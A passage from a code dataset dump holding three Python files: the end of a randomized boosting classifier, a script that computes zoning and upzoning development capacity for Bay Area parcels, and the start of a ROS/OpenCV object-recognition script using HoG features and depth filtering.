range(n_estimators): # create n weak learners\n\n\n inds = choice(np.arange(n), p=weights, size=size, replace=True)\n X_selected = X[inds, :]\n y_selected = y[inds]\n\n\n stump = DecisionTreeClassifier(max_depth=self.max_depth)\n stump.fit(X_selected, y_selected)\n\n\n for i, correct in enumerate(stump.predict(X_selected)*y_selected): #update weights, correct is 1/-1\n # weights[i] *= math.exp(-self.eps*correct*random.uniform(0,2))\n weights[i] = random.random()\n weights /= sum(weights)\n\n\n self.weak_learners.append(stump) # add weak learner to ensemble\n\n\n def predict(self, X):\n if len(self.weak_learners) < 1:\n raise Exception(\"Must fit before predicting!\")\n\n return np.sign(sum(map(lambda learner: learner.predict(X), self.weak_learners)))\n\n\n # accuracy\n def score(self, X, y):\n return sum(y==self.predict(X))/len(y)\n\n\n\n","sub_path":"old/randhboost.py","file_name":"randhboost.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"369172035","text":"USAGE=\"\"\"\n\n Given a set of base zoning (parcel-level) and zoning_mods (representing one upzoning scheme) data, \n calculate the raw and net development capacity under the upzoning scheme.\n\n Input: p10, parcels with PARCEL_ID, ACRES attributes\n zoning_parcels_hybrid_pba50.csv, p10 combined with zoning_id data output by 4_create_hybrid_urbansim_input.py\n zoning_lookup_hybrid_pba50.csv, lookup table of zoning_id to allowable development types and intensities\n p10_pba50_attr.csv, p10 combined with zoningmods categories data\n \n Output: compare_juris_capacity.csv, jurisdiction-level development capacity metrics\n compare_taz_capacity.csv, TAZ-level development capacity metrics\n\n\n Run with (scenario 23 as an example): \n python calculate_upzoning_capacity.py -zoningmods_scenario \"24\" -zoningmods_version \"20200916\" -attr_version \"20200915\" -test\n\n In test mode (specified by --test), outputs files to cwd and without date prefix; otherwise, outputs to PLU_BOC_DIR with date prefix\n\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport argparse, os, glob, logging, sys, time\nimport dev_capacity_calculation_module\n\nNOW = time.strftime(\"%Y_%m%d_%H%M\")\ntoday = time.strftime('%Y_%m_%d')\n\n\nif os.getenv('USERNAME') =='ywang':\n M_DIR = 'M:\\\\Data\\\\Urban\\\\BAUS\\\\PBA50\\\\Final_Blueprint'\n M_SMELT_DIR = 'M:\\\\Data\\\\GIS layers\\\\UrbanSim smelt\\\\2020 03 12'\n BOX_DIR = 'C:\\\\Users\\\\{}\\\\Box\\\\Modeling and Surveys\\\\Urban Modeling\\\\Bay Area UrbanSim\\\\PBA50'.format(os.getenv('USERNAME'))\n# GITHUB_URBANSIM_DIR = 'C:\\\\Users\\\\{}\\\\Documents\\\\GitHub\\\\bayarea_urbansim\\\\data'.format(os.getenv('USERNAME'))\n\nelif os.getenv('USERNAME') =='lzorn':\n M_DIR = 'M:\\\\Data\\\\Urban\\\\BAUS\\\\PBA50\\\\Final_Blueprint'\n M_SMELT_DIR = 'M:\\\\Data\\\\GIS layers\\\\UrbanSim smelt\\\\2020 03 12'\n BOX_DIR = 'C:\\\\Users\\\\{}\\\\Box\\\\Modeling and Surveys\\\\Urban Modeling\\\\Bay Area UrbanSim\\\\PBA50'.format(os.getenv('USERNAME'))\n# GITHUB_URBANSIM_DIR = 'C:\\\\Users\\\\{}\\\\Documents\\\\GitHub\\\\bayarea_urbansim\\\\data'.format(os.getenv('USERNAME'))\n\n\n# raw and net development capacity metrics\nRAW_CAPACITY_CODES = ['zoned_du', 'zoned_Ksqft', 'job_spaces']\nNET_CAPACITY_CODES = ['zoned_du_vacant', 'zoned_Ksqft_vacant', 'job_spaces_vacant',\n 'zoned_du_underbuild', 'zoned_Ksqft_underbuild', 'job_spaces_underbuild',\n 'zoned_du_underbuild_noProt', 'zoned_Ksqft_underbuild_noProt', 'job_spaces_underbuild_noProt']\nBAUS_CAPACITY_CODES = ['residential_units',\n 'job_spaces',\n 'non_residential_sqft',\n 'zoned_du_underbuild',\n 'zoned_du',\n 'zoned_du_underbuild_nodev',\n 'totemp']\n\n\ndef apply_upzoning_to_parcel_data(logger, parcel_basezoning_original,\n upzoning_scenario, upzoning_version):\n \"\"\"\n Apply upzoning to parcels by adjusting the allowable development types and intensities.\n\n * upzoning_scenario: version of zoning_mods for upzoning, e.g. 's20', 's21', 's22', \n 's23' for Draft/Final Blueprint\n\n Returns a dataframe with columns PARCEL_ID, juris_zmod, plus XX_upzoning for each allowed \n development type or intensity attribute.\n \"\"\"\n \n\n\n # Make a copy and add '_basezoning' to basezoning attributes\n parcel_basezoning = parcel_basezoning_original.copy()\n\n\n # Read zoningmods lookup data and merge with parcels\n zmods_upzoning_file = os.path.join(PBA50_ZONINGMODS_DIR, \n 'zoning_mods_{}_{}.csv'.format(upzoning_scenario, upzoning_version))\n\n if not os.path.exists(zmods_upzoning_file):\n print('Error: file {} not found'.format(zmods_upzoning_file))\n raise\n\n use_cols = ['fbpzoningm','add_bldg', 'drop_bldg', \n 'dua_up', 'far_up', 'dua_down', 'far_down', 'res_rent_cat']\n zmods_upzoning_df = pd.read_csv(zmods_upzoning_file, usecols = use_cols)\n\n # Merge upzoning with basezoning\n parcel_basezoning_zoningmods = parcel_basezoning.merge(zmods_upzoning_df,\n on = 'fbpzoningm', \n how = 'left')\n\n keep_cols = list(parcel_basezoning)\n\n # create allowed development type and intensity columns for upzoning\n # and default to base zoning\n for dev_type in dev_capacity_calculation_module.ALLOWED_BUILDING_TYPE_CODES:\n parcel_basezoning_zoningmods[\"{}_{}\".format(dev_type, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[\"{}_basezoning\".format(dev_type)]\n # keep the new column\n keep_cols.append(\"{}_{}\".format(dev_type, upzoning_scenario))\n\n for intensity in dev_capacity_calculation_module.INTENSITY_CODES:\n parcel_basezoning_zoningmods[\"max_{}_{}\".format(intensity, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[\"max_{}_basezoning\".format(intensity)]\n # keep the new column\n keep_cols.append(\"max_{}_{}\".format(intensity, upzoning_scenario))\n\n\n # Get a list of development types that have modifications in pba50zoningmod\n add_bldg_types = list(zmods_upzoning_df.add_bldg.dropna().unique())\n logger.info('Development types enabled by upzoning:\\n{}'.format(add_bldg_types))\n drop_bldg_types = list(zmods_upzoning_df.drop_bldg.dropna().unique())\n logger.info('Development types disallowed by upzoning:\\n{}'.format(drop_bldg_types))\n\n\n # Make a copy and then modify the alowed dev types\n #zoning_modify_type = zoning_base_pba50.copy()\n\n if len(add_bldg_types) > 0:\n for devType in add_bldg_types:\n add_bldg_parcels = parcel_basezoning_zoningmods.add_bldg == devType\n parcel_basezoning_zoningmods.loc[add_bldg_parcels, devType+'_'+upzoning_scenario] = 1\n\n if len(drop_bldg_types) > 0:\n for devType in drop_bldg_types:\n drop_bldg_parcels = parcel_basezoning_zoningmods.drop_bldg == devType\n parcel_basezoning_zoningmods.loc[drop_bldg_parcels,devType+'_'+upzoning_scenario] = 0\n\n # Compare allowed dev types before and after applying pba50zoningmod\n for devType in add_bldg_types + drop_bldg_types:\n logger.info('Out of {:,} parcels: \\n {:,} parcels allow {} before applying fbpzoningm dev type adjustment;\\\n \\n {:,} parcels allow {} after applying fbpzoningm dev type adjustment.'.format(len(parcel_basezoning_zoningmods),\n len(parcel_basezoning_zoningmods.loc[parcel_basezoning_zoningmods[devType+'_basezoning'] == 1]), devType,\n len(parcel_basezoning_zoningmods.loc[parcel_basezoning_zoningmods[devType+'_'+upzoning_scenario] == 1]), devType))\n\n\n # Make a copy and then modify the intensities\n #zoning_modify_intensity = zoning_modify_type.copy()\n\n for intensity in ['dua','far']:\n\n # modify intensity when 'intensity_up' is not null\n up_parcels = parcel_basezoning_zoningmods['{}_up'.format(intensity)].notnull()\n\n # the effective max_dua is the larger of base zoning max_dua and the pba50 max_dua\n parcel_basezoning_zoningmods.loc[up_parcels, 'max_{}_{}'.format(intensity, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[['max_{}_{}'.format(intensity, upzoning_scenario),'{}_up'.format(intensity)]].max(axis = 1)\n\n # modify intensity when 'intensity_up' is not null\n down_parcels = parcel_basezoning_zoningmods['{}_down'.format(intensity)].notnull()\n\n # the effective max_dua is the larger of base zoning max_dua and the pba50 max_dua\n parcel_basezoning_zoningmods.loc[down_parcels, 'max_{}_{}'.format(intensity, upzoning_scenario)] = \\\n parcel_basezoning_zoningmods[['max_{}_{}'.format(intensity, upzoning_scenario),'{}_down'.format(intensity)]].min(axis = 1)\n\n # Compare max_dua and max_far before and after applying pba50zoningmod\n logger.info('Before applying fbpzoningm intensity adjustment: \\n', \n parcel_basezoning_zoningmods[['max_'+intensity+'_basezoning']].describe())\n logger.info('After applying fbpzoningm intensity adjustment: \\n', \n parcel_basezoning_zoningmods[['max_'+intensity+'_'+upzoning_scenario]].describe())\n\n parcel_upzoning = parcel_basezoning_zoningmods[keep_cols]\n logger.info('Generate parcel-level upzoning table of {:,} records: \\n {}'.format(len(parcel_upzoning), parcel_upzoning.head()))\n return parcel_upzoning\n\ndef summary_capacity(parcel_capacity, groupby_field, capacity_metrics):\n return parcel_capacity.groupby([groupby_field])[capacity_metrics].sum().reset_index()\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter,)\n parser.add_argument(\"-zoningmods_scenario\", help=\"zoningmods scenario\")\n parser.add_argument(\"-zoningmods_version\", help=\"version of zoningmods, represented by the date\")\n parser.add_argument(\"-attr_version\", help=\"version of p10_pba50_attr, represented by the date\")\n parser.add_argument(\"-test\", action=\"store_true\", help=\"Test mode\")\n args = parser.parse_args()\n\n ## inputs\n URBANSIM_BASEZONING_DIR = os.path.join(M_DIR, 'Large General Input Data')\n PARCEL_ZONING_ID_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_06_22_zoning_parcels_hybrid_pba50.csv')\n BASEZONING_LOOKUP_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_06_22_zoning_lookup_hybrid_pba50.csv')\n # URBANSIM_PARCEL_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_04_17_parcels_geography.csv')\n URBANSIM_PARCEL_TAZ_FILE = os.path.join(URBANSIM_BASEZONING_DIR, '2020_08_17_parcel_to_taz1454sub.csv')\n\n PBA50_ZONINGMODS_DIR = os.path.join(M_DIR, 'Zoning Modifications')\n PARCEL_ZONINGMODS_PBA50_FILE = os.path.join(PBA50_ZONINGMODS_DIR, 'p10_pba50_attr_{}.csv'.format(str(args.attr_version)))\n\n # output\n # In test mode (specified by --test), outputs to cwd and without date prefix; otherwise, outputs to URBANSIM_UPZONING_DIR with date prefix\n BOX_UPZONING_DIR = os.path.join(BOX_DIR, 'Policies', 'Zoning Modifications', 'capacity')\n\n COMPARE_JURIS_CAPACITY_FILE = \"compare_juris_capacity_{}.csv\".format(args.zoningmods_scenario)\n COMPARE_TAZ_CAPACITY_FILE = 'compare_taz_capacity_{}.csv'.format(args.zoningmods_scenario)\n LOG_FILE = \"compare_juris_capacity_{}.log\".format(args.zoningmods_scenario)\n\n # QA/QC files exported in test mode\n P10_BASEZONING_FILE = 'p10_basezoning.csv'\n P10_UPZONING_PBA50_FILE = 'p10_upzoning_pba50_{}.csv'.format(args.zoningmods_scenario)\n PARCEL_CAPACITY_BASEZONING_FILE = 'parcel_capacity_basezoning.csv'\n PARCEL_CAPACITY_UPZONING_FILE = 'parcel_capacity_upzoning_{}.csv'.format(args.zoningmods_scenario)\n PARCEL_CAPACITY_BAUS_FILE = 'parcel_capacity_baus_{}.csv'.format(args.zoningmods_scenario)\n \n\n if args.test == False:\n LOG_FILE = os.path.join(BOX_UPZONING_DIR, \"{}_{}\".format(today, LOG_FILE))\n COMPARE_JURIS_CAPACITY_FILE = os.path.join(BOX_UPZONING_DIR, \"{}_{}\".format(today, COMPARE_JURIS_CAPACITY_FILE))\n COMPARE_TAZ_CAPACITY_FILE = os.path.join(BOX_UPZONING_DIR, \"{}_{}\".format(today, COMPARE_TAZ_CAPACITY_FILE))\n\n pd.set_option('max_columns', 200)\n pd.set_option('display.width', 200)\n\n # create logger\n logger = logging.getLogger(__name__)\n logger.setLevel('DEBUG')\n\n # console handler\n ch = logging.StreamHandler()\n ch.setLevel('INFO')\n ch.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))\n logger.addHandler(ch)\n # file handler\n fh = logging.FileHandler(LOG_FILE, mode='w')\n fh.setLevel('DEBUG')\n fh.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))\n logger.addHandler(fh)\n\n logger.info(\"BOX_UPZONING_DIR = {}\".format(BOX_UPZONING_DIR))\n logger.info(\"COMPARE_JURIS_CAPACITY_FILE = {}\".format(COMPARE_JURIS_CAPACITY_FILE))\n logger.info(\"COMPARE_TAZ_CAPACITY_FILE = {}\".format(COMPARE_TAZ_CAPACITY_FILE))\n\n ## Read p10 parcels data\n basemap_p10_file = os.path.join(M_SMELT_DIR, 'p10.csv')\n basemap_p10 = pd.read_csv(basemap_p10_file,\n usecols =['PARCEL_ID', 'ACRES', 'LAND_VALUE'])\n # conver PARCEL_ID to integer:\n basemap_p10['PARCEL_ID'] = basemap_p10['PARCEL_ID'].apply(lambda x: int(round(x)))\n logger.info(\"Read {:,} rows from {}\".format(len(basemap_p10), basemap_p10_file))\n logger.info(\"\\n{}\".format(basemap_p10.head()))\n logger.info('Number of unique PARCEL_ID: {}'.format(len(basemap_p10.PARCEL_ID.unique())))\n\n\n ## Read parcel with base zoning data\n parcel_use_cols = ['PARCEL_ID', 'zoning_id','nodev']\n parcel_zoning_id = pd.read_csv(PARCEL_ZONING_ID_FILE,\n usecols = parcel_use_cols)\n parcel_zoning_id.rename(columns = {'PARCEL_ID': 'PARCEL_ID_pz'}, inplace=True)\n basezoning_lookup = pd.read_csv(BASEZONING_LOOKUP_FILE)\n basezoning_lookup.columns = [col+'_basezoning' for col in basezoning_lookup.columns.values]\n\n parcel_basezoning = parcel_zoning_id.merge(basezoning_lookup,\n left_on = 'zoning_id',\n right_on = 'id_basezoning',\n how = 'left')\n parcel_basezoning.rename(columns = {'nodev': 'nodev_basezoning'}, inplace=True)\n logger.info(\"Parcels with base zoning has {} records, with columns:\\n{}\".format(len(parcel_basezoning), parcel_basezoning.dtypes))\n\n\n # Read PBA50 zoningmods\n parcel_zoningmods = pd.read_csv(PARCEL_ZONINGMODS_PBA50_FILE,\n usecols = ['PARCEL_ID', 'fbpzoningm', 'juris'])\n parcel_zoningmods.PARCEL_ID = parcel_zoningmods.PARCEL_ID.apply(lambda x: int(round(x)))\n parcel_zoningmods.rename(columns = {'PARCEL_ID': 'PARCEL_ID_attr'}, inplace=True)\n\n # Add base zoning and PBA50 zoningmods to p10 parcels\n p10_basezoning = basemap_p10.merge(parcel_basezoning,\n left_on = 'PARCEL_ID',\n right_on = 'PARCEL_ID_pz',\n how = 'left').merge(parcel_zoningmods,\n left_on = 'PARCEL_ID',\n right_on = 'PARCEL_ID_attr',\n how = 'left')\n # in test mode, export the data for QA/QC\n if args.test == True:\n logger.info(\"Export p10_basezoning\")\n p10_basezoning.to_csv(P10_BASEZONING_FILE, index=False)\n\n\n logger.info(\"Running step ------ Applying upzoning {}\".format('zoning_mods_{}_{}.csv'.format(args.zoningmods_scenario, \n args.zoningmods_version)))\n\n p10_upzoning_pba50 = apply_upzoning_to_parcel_data(logger, p10_basezoning, args.zoningmods_scenario, args.zoningmods_version)\n\n logger.info(\"Generating p10_upzoning_pba50 with {} records;\\n Headers:\\n{}\".format(len(p10_upzoning_pba50),\n p10_upzoning_pba50.head()))\n\n\n ## B10 buildings with p10 parcels data\n basemap_b10_file = os.path.join(M_SMELT_DIR, 'b10.csv')\n basemap_b10 = pd.read_csv(basemap_b10_file)\n # conver PARCEL_ID to integer:\n basemap_b10['parcel_id'] = basemap_b10['parcel_id'].apply(lambda x: int(round(x)))\n logger.info(\"Read {:,} rows from {}\".format(len(basemap_b10), basemap_b10_file))\n logger.info(\"\\n{}\".format(basemap_b10.head()))\n logger.info('b10 building data has {:,} unique PARCEL_ID:'.format(len(basemap_b10.parcel_id.unique())))\n\n # join parcels to buildings which is used to determine current built-out condition when calculating net capacity\n building_parcel = pd.merge(left=basemap_b10, \n right=basemap_p10[['PARCEL_ID','LAND_VALUE','ACRES']],\n left_on='parcel_id', \n right_on='PARCEL_ID', \n how='outer')\n\n # compute allowed development type - residential vs non-residential for each parcel\n basezoning_allow_dev_type = \\\n dev_capacity_calculation_module.set_allow_dev_type(p10_upzoning_pba50, boc_source=\"basezoning\")\n upzoning_allow_dev_type = \\\n dev_capacity_calculation_module.set_allow_dev_type(p10_upzoning_pba50, boc_source=args.zoningmods_scenario)\n\n # put them together\n p10_upzoning_pba50 = p10_upzoning_pba50.merge(basezoning_allow_dev_type,\n on = 'PARCEL_ID',\n how = 'left').merge(upzoning_allow_dev_type,\n on = 'PARCEL_ID',\n how = 'left')\n \n # Add TAZ id to parcel data\n parcel_taz = pd.read_csv(URBANSIM_PARCEL_TAZ_FILE,\n \t usecols = ['PARCEL_ID', 'ZONE_ID'])\n parcel_taz.PARCEL_ID = parcel_taz.PARCEL_ID.apply(lambda x: int(round(x)))\n parcel_taz.ZONE_ID = parcel_taz.ZONE_ID.apply(lambda x: int(round(x)))\n parcel_taz.rename(columns ={'PARCEL_ID': 'PARCEL_ID_taz'}, inplace=True)\n\n p10_upzoning_pba50 = p10_upzoning_pba50.merge(parcel_taz,\n \t left_on = 'PARCEL_ID',\n right_on = 'PARCEL_ID_taz',\n \t how = 'left')\n\n logger.debug(\"p10_upzoning_pba50 with columns:\\n{}\".format(p10_upzoning_pba50.dtypes))\n\n # in test mode, export the data for QA/QC\n if args.test == True:\n logger.info(\"Export p10_upzoning_pba50\")\n p10_upzoning_pba50.to_csv(P10_UPZONING_PBA50_FILE, index = False)\n\n\n ## calculate raw and net capacity for basezoning and upzoning\n\n logger.info(\"Running step ------ Calculating raw development capacity under basezoning\")\n\n raw_parcel_capacity_basezoning = dev_capacity_calculation_module.calculate_capacity(p10_upzoning_pba50,\n \"basezoning\",\n \"basezoning\",\n pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"raw_parcel_capacity_basezoning.head():\\n{}\".format(raw_parcel_capacity_basezoning.head()))\n\n logger.info(\"Running step ------ Calculating raw development capacity under {}\".format('zoning_mods_'+args.zoningmods_scenario))\n raw_parcel_capacity_upzoning = dev_capacity_calculation_module.calculate_capacity(p10_upzoning_pba50,\n args.zoningmods_scenario,\n \"basezoning\",\n pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"raw_parcel_capacity_upzoning.head():\\n{}\".format(raw_parcel_capacity_upzoning.head()))\n \n logger.info(\"Running step ------ Calculating net development capacity under basezoning\")\n\n net_parcel_capacity_basezoning = dev_capacity_calculation_module.calculate_net_capacity(logger, \n p10_upzoning_pba50,\n \"basezoning\",\n \"basezoning\",\n building_parcel,\n net_pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"net_parcel_capacity_basezoning.head():\\n{}\".format(net_parcel_capacity_basezoning.head())) \n\n logger.info(\"Running step ------ Calculating net development capacity under {}\".format('zoning_mods_'+args.zoningmods_scenario))\n net_parcel_capacity_upzoning = dev_capacity_calculation_module.calculate_net_capacity(logger, \n p10_upzoning_pba50,\n args.zoningmods_scenario,\n \"basezoning\",\n building_parcel,\n net_pass_thru_cols=[\"juris\", 'ZONE_ID'])\n logger.debug(\"net_parcel_capacity_upzoning.head():\\n{}\".format(net_parcel_capacity_upzoning.head()))\n\n # in test mode, export the data for QA/QC\n if args.test == True:\n raw_parcel_capacity_basezoning.to_csv('raw_parcel_capacity_basezoning.csv', index = False)\n net_parcel_capacity_basezoning.to_csv('net_parcel_capacity_basezoning.csv', index = False)\n raw_parcel_capacity_upzoning.to_csv('raw_parcel_capacity_upzoning.csv', index = False)\n net_parcel_capacity_upzoning.to_csv('net_parcel_capacity_upzoning.csv', index = False)\n\n\n ## calculate jurisdiction-level capacity\n\n juris_raw_capacity_basezoning = summary_capacity(raw_parcel_capacity_basezoning, \n 'juris', \n [raw_metrics + '_basezoning' for raw_metrics in RAW_CAPACITY_CODES])\n\n juris_net_capacity_basezoning = summary_capacity(net_parcel_capacity_basezoning, \n 'juris', \n [net_metrics + '_basezoning' for net_metrics in NET_CAPACITY_CODES]) \n\n juris_raw_capacity_upzoning = summary_capacity(raw_parcel_capacity_upzoning, \n 'juris', \n [raw_metrics + '_' + args.zoningmods_scenario for raw_metrics in RAW_CAPACITY_CODES])\n\n juris_net_capacity_upzoning = summary_capacity(net_parcel_capacity_upzoning, \n 'juris', \n [net_metrics + '_' + args.zoningmods_scenario for net_metrics in NET_CAPACITY_CODES])\n\n\n ## calculate taz-level capacity\n taz_raw_capacity_basezoning = summary_capacity(raw_parcel_capacity_basezoning, \n 'ZONE_ID', \n [raw_metrics + '_basezoning' for raw_metrics in RAW_CAPACITY_CODES])\n\n taz_net_capacity_basezoning = summary_capacity(net_parcel_capacity_basezoning, \n 'ZONE_ID', \n [net_metrics + '_basezoning' for net_metrics in NET_CAPACITY_CODES]) \n\n taz_raw_capacity_upzoning = summary_capacity(raw_parcel_capacity_upzoning, \n 'ZONE_ID', \n [raw_metrics + '_' + args.zoningmods_scenario for raw_metrics in RAW_CAPACITY_CODES])\n\n taz_net_capacity_upzoning = summary_capacity(net_parcel_capacity_upzoning, \n 'ZONE_ID', \n [net_metrics + '_' + args.zoningmods_scenario for net_metrics in NET_CAPACITY_CODES])\n\n\n # merge to generate juris-level summary\n juris_capacity_compare = juris_raw_capacity_basezoning.merge(juris_net_capacity_basezoning,\n on = 'juris').merge(juris_raw_capacity_upzoning,\n on = 'juris').merge(juris_net_capacity_upzoning,\n on = 'juris')\n juris_capacity_compare.rename(columns = {'juris': 'jurisdiciton'}, inplace = True)\n\n logger.debug(\"juris_capacity_compare.head():\\n{}\".format(juris_capacity_compare.head()))\n\n # merge to generate taz-level summary\n taz_capacity_compare = taz_raw_capacity_basezoning.merge(taz_net_capacity_basezoning,\n on = 'ZONE_ID').merge(taz_raw_capacity_upzoning,\n on = 'ZONE_ID').merge(taz_net_capacity_upzoning,\n on = 'ZONE_ID')\n logger.debug(\"taz_capacity_compare.head():\\n{}\".format(taz_capacity_compare.head()))\n\n ## Export data\n\n # export jurisdiction-level capacity comparison\n logger.info(\"Export development capacity comparison by jurisdiciton: \\n{}\".format(juris_capacity_compare.dtypes))\n juris_capacity_compare.to_csv(COMPARE_JURIS_CAPACITY_FILE, index = False)\n\n # export taz-level capacity comparison\n logger.info(\"Export development capacity comparison by TAZ: \\n{}\".format(taz_capacity_compare.dtypes))\n taz_capacity_compare.to_csv(COMPARE_TAZ_CAPACITY_FILE, index = False)","sub_path":"policies/plu/calculate_upzoning_capacity.py","file_name":"calculate_upzoning_capacity.py","file_ext":"py","file_size_in_byte":26415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256574652","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport rospy\nimport numpy as np\nimport cv2\nfrom cv_bridge import CvBridge\nimport random\nfrom skimage.feature import hog\nfrom sklearn.linear_model import SGDClassifier\nimport pickle\nimport os\nimport time\nimport bufferImageMsg\n\n#############\n# Constants #\n#############\n\nWIDTH = 1280\nHEIGHT = 960\n\nNB_MSG_MAX = 50\nNB_MAX_DEPTH_IMG = 30\n\nNB_IMG_FOR_LEARN = 30\n\nLRN_PATH = './LRN_IMGS/'\nTEST_PATH = './TST_IMGS/'\n\nMAIN_WINDOW = \"Controls\"\n\nSHOW_COLOR_IMG = \"Show color img\"\nSHOW_DEPTH_IMG = \"Show depth img\"\n\nLEARN_FROM_DISK = \"Learn from DISK\"\nTEST_FROM_DISK = \"Test\"\nUNKNOWN_OBJECT = \"Unknown?\"\n\nRUN_NAME = \"Run\"\n\n\n#########\n# Class #\n#########\n\nclass ImgAveraging:\n def __init__(self, nb_max):\n self.__NB_MAX_REF = nb_max\n self.__NB_MAX = nb_max\n self.__nb_stock = 0\n self.__first = 0\n self.__last = 0\n self.__container = [0 for _ in range(nb_max)]\n self.__img_sum = 0\n\n def average(self):\n av = np.array([[0]])\n\n if self.__nb_stock > 0:\n av = self.__img_sum / self.__nb_stock\n\n return av\n\n def new_capacity(self, nb):\n # redefined object\n if self.__NB_MAX_REF >= nb > 0:\n self.__NB_MAX = nb\n self.__nb_stock = 0\n self.__first = 0\n self.__last = 0\n self.__img_sum = 0\n\n def new_img(self, img):\n if self.__nb_stock == self.__NB_MAX:\n self.__img_sum -= self.__peek()\n\n self.__img_sum += img\n self.__push(img)\n\n def __peek(self):\n item = None\n\n if self.__nb_stock > 0:\n item = self.__container[self.__first]\n\n return item\n\n def __pop(self):\n item = None\n\n if self.__nb_stock > 0:\n item = self.__container[self.__first]\n self.__first += 1\n self.__first %= self.__NB_MAX\n self.__nb_stock -= 1\n\n return item\n\n def __push(self, img):\n # erase first item if the container is full\n if self.__nb_stock == self.__NB_MAX:\n self.__pop()\n\n self.__container[self.__last] = img\n self.__last += 1\n self.__last %= self.__NB_MAX\n self.__nb_stock += 1\n\n\n####################\n# Global variables #\n####################\nb_size = 64 # 15 block size\nb_stride = 32\nc_size = 32 # 15 cell size\ncallback_rgb_timer = 0\nclf = SGDClassifier(loss='log')\ncolor = ''\ncolor_buffer_msg = bufferImageMsg.BufferImageMsg(NB_MSG_MAX)\ncolor_img = np.array([[0]])\ndebug_flag = 1\ndepth_buffer_msg = bufferImageMsg.BufferImageMsg(1)\ndepth_capture = 0.03\ndepth_img = np.array([[0]])\ndepth_img_averaging = ImgAveraging(NB_MAX_DEPTH_IMG)\nhog_list = list()\nimg_bgr8_clean = np.array([[0]])\nimg_clean_bgr_learn = np.array([[0]])\nimg_clean_gray_class = np.array([[0]])\ninteractions_flag = 0\nimplements_p_fit = 1\nlabel = ''\nlabels = list()\nlast_hog = 0\nlearn_flag = 0\nlive_cnt = 0\nlive_flag = 0\nloaded_flag = 0\nn_bin = 6 # 4 # number of orientations for the HoG\nnb_depth_img = 30\nrecording_flag = 0\nrotation = 0\nrun_flag = 0\nsaved_flag = 0\nsaving_learn = 0\nsaving_test = 0\nshow_color_img_flag = 0\nshow_depth_img_flag = 0\nshow_flag = 1\nshuffled_x = list()\nshuffled_y = list()\nstart_time2 = 0\n\n# __TEST__\nbegin_learn = 0\nend_learn = 0\n\n\n######################\n# Callback functions #\n######################\n\ndef depth_capture_callback(n):\n global depth_capture\n if n == 0:\n n = 1\n depth_capture = float(n) / 100\n\n\ndef learn_from_disk_callback(value):\n global begin_learn\n global learn_flag\n global show_flag\n\n learn_from_disk()\n learn_flag = 1\n\n\ndef run_callback(value):\n global run_flag\n run_flag = value\n\n\ndef main_callback(_):\n get_color_img()\n get_depth_img()\n\n show_color_img()\n show_depth_img()\n\n if run_flag == 1:\n filter_by_depth()\n cv2.waitKey(1)\n\n\ndef nb_depth_img_callback(n):\n global nb_depth_img\n nb_depth_img = n\n if nb_depth_img <= 0:\n nb_depth_img = 1\n\n\ndef show_color_img_callback(value):\n global show_color_img_flag\n show_color_img_flag = value\n\n\ndef show_depth_img_callback(value):\n global show_depth_img_flag\n show_depth_img_flag = value\n\n\ndef test_from_disk_callback(value):\n if value == 1:\n test_from_disk()\n\n\ndef unknown_object_callback(value):\n if value == 1:\n color_buffer_msg.run(NB_IMG_FOR_LEARN)\n\n\n#############\n# Functions #\n#############\n\ndef clean(img, n):\n # set the non-finite values (NaN, inf) to n\n # returns 1 where the img is finite and 0 where it is not\n mask = np.isfinite(img)\n # where mask puts img, else puts n, so where is finite puts img, else puts n\n return np.where(mask, img, n)\n\n\ndef filter_by_depth():\n # Uses the depth image to only take the part of the image corresponding to the closest point and a bit further\n global depth_img_averaging\n\n depth_img_avg = depth_img_averaging.average()\n closest_pnt = np.amin(depth_img_avg)\n depth_img_avg = cv2.resize(depth_img_avg, (WIDTH, HEIGHT))\n depth_range = closest_pnt + depth_capture\n # generate a mask with the closest points\n img_detection = np.where(depth_img_avg < depth_range, depth_img_avg, 0)\n # put all the pixels greater than 0 to 255\n ret, mask = cv2.threshold(img_detection, 0.0, 255, cv2.THRESH_BINARY)\n mask = np.array(mask, dtype=np.uint8) # convert to 8-bit\n im2, contours, hierarchy = cv2.findContours(mask, 1, 2, offset=(0, -6))\n biggest_cont = contours[0]\n for cnt in contours:\n if cv2.contourArea(cnt) > cv2.contourArea(biggest_cont):\n biggest_cont = cnt\n min_area_rect = cv2.minAreaRect(biggest_cont) # minimum area rectangle that encloses the contour cnt\n (center, size, angle) = cv2.minAreaRect(biggest_cont)\n points = cv2.boxPoints(min_area_rect) # Find four vertices of rectangle from above rect\n points = np.int32(np.around(points)) # Round the values and make it integers\n img_bgr8_clean_copy = img_bgr8_clean.copy()\n cv2.drawContours(img_bgr8_clean_copy, [points], 0, (0, 0, 255), 2)\n cv2.drawContours(img_bgr8_clean_copy, biggest_cont, -1, (255, 0, 255), 2)\n cv2.namedWindow('RBG', cv2.WINDOW_NORMAL)\n cv2.imshow('RBG', img_bgr8_clean_copy)\n cv2.waitKey(1)\n # if we rotate more than 90 degrees, the width becomes height and vice-versa\n if angle < -45.0:\n angle += 90.0\n width, height = size[0], size[1]\n size = (height, width)\n rot_matrix = cv2.getRotationMatrix2D(center, angle, 1.0)\n # rotate the entire image around the center of the parking cell by the\n # angle of the rotated rect\n img_width, img_height = (img_bgr8_clean.shape[0], img_bgr8_clean.shape[1])\n rotated = cv2.warpAffine(img_bgr8_clean, rot_matrix, (img_height, img_width), flags=cv2.INTER_CUBIC)\n 